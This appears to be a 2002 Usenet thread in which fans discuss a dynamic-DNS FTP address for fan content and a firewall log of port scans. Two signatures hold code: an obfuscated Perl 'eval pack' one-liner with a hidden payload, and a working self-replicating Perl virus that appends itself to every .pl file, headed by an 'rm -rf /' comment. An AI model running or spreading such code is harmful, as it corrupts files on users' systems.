ftp://tessai.kicks-ass.net (NEVER EVER USE A WEB BROWSER!!!)
to connect to the ftp instead of trying to remember my ip number. ^_^
Pen^3 and others should update their FAQs. I'll try to make sure this
name remains mine. Thanks guys.
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Tessai
More information that you can shake a stick at: www.evafaq.com
Always check there for the latest ftp information,
as well as all of the other cool goodies.
GO GO GO!!! Now!!! Hurry!!! If you don't the gods
will not be pleased. And of course, when you mess
with the forest gods, well, you know what happens.
perl -e "eval pack 'h*','675636824225c203c2332392d303875324532363544324b36756368242e4c203c2332392d303875344534363537333b36756368242b4c203c2332392d303877333631363932303b3072796e6474225c242e4c242b4'"
Uh, just cause I'm stupid, why wouldn't you use a browser?
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Kind regards
Disaster
Disaster's Fan Fiction - http://www.disfanfic.net
DSE - For the Public - http://www.disfanfic.net/DSE
JAE FAQ - http://www.evafaq.com
Pen^3's JAE FAQ - http://faq.pen3.cjb.net
Convention Reports - http://www.disfanfic.net/conventions
Because it opens two connections.
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#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
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Gotcha! And that is bad! BAD!
Which reminds me. I sent you an email! You get it?
I meant Tessai, not you!
On Wed, 17 Jul 2002 20:25:58 +0200, Rudolf Polzer
<AntiATFiel...@durchnull.de> wrote:
>Scripsit illa aut ille Disaster <disa...@disfanfic.net>:
>> "Tessai" <Tes...@cryogen.com> wrote:
>> > Just today, I spoke with a few of my Linux buddies, and they turned me
>> > on to www.dyndns.org, who host free DynamicDNS (it's been mentioned
>> > before, but I totally forgot about it). Now, ftp users can use:
>> >
>> > ftp://tessai.kicks-ass.net (NEVER EVER USE A WEB BROWSER!!!)
>>
>> Uh, just cause I'm stupid, why wouldn't you use a browser?
>
>Because it opens two connections.
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Now here's something I just had to post:
The Firewall has blocked a connection attempt made to
24.126.86.127:666 from 68.80.233.254:1621, protocol: TCP. Known virus
to attack on this port: Attack FTP, Back Construction, Cain & Abel,
NokNok, Satans Back Door - SBD, ServU, Shadow Phyre
Of course, it should be obvious that this is from my firewall. The
most common connection attempts are on ports:
80, 8080, 1080, 111, 27374, 8081, 6667, 23, and 81.
As you can see, people are always scanning me for holes, or trying to
see if I have a trojan running. This is why I ask for people to set
retry attempts to more than 30 seconds (45 seconds at least).
On Wed, 17 Jul 2002 11:51:37 -0700, "Disaster"
<disa...@disfanfic.net> wrote:
>"Disaster" <disa...@disfanfic.net> wrote:
>> "Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote:
>> > Because it opens two connections.
>>
>> Gotcha! And that is bad! BAD!
>>
>> Which reminds me. I sent you an email! You get it?
>
>I meant Tessai, not you!
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*Nod*
Thanks.
> Now here's something I just had to post:
>
> The Firewall has blocked a connection attempt made to
> 24.126.86.127:666 from 68.80.233.254:1621, protocol: TCP. Known virus
> to attack on this port: Attack FTP, Back Construction, Cain & Abel,
> NokNok, Satans Back Door - SBD, ServU, Shadow Phyre
>
> Of course, it should be obvious that this is from my firewall. The
> most common connection attempts are on ports:
>
> 80, 8080, 1080, 111, 27374, 8081, 6667, 23, and 81.
>
> As you can see, people are always scanning me for holes, or trying to
> see if I have a trojan running. This is why I ask for people to set
> retry attempts to more than 30 seconds (45 seconds at least).
Well, I waited at least a year! :P
Pen^3 has updated his FAQ. Yet again...
The last 3 changes have been for your FTP address...
P^3
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> Just today, I spoke with a few of my Linux buddies, and they
> turned me on to www.dyndns.org, who host free DynamicDNS (it's
> been mentioned before, but I totally forgot about it). Now, ftp
> users can use:
Certainly has. :D
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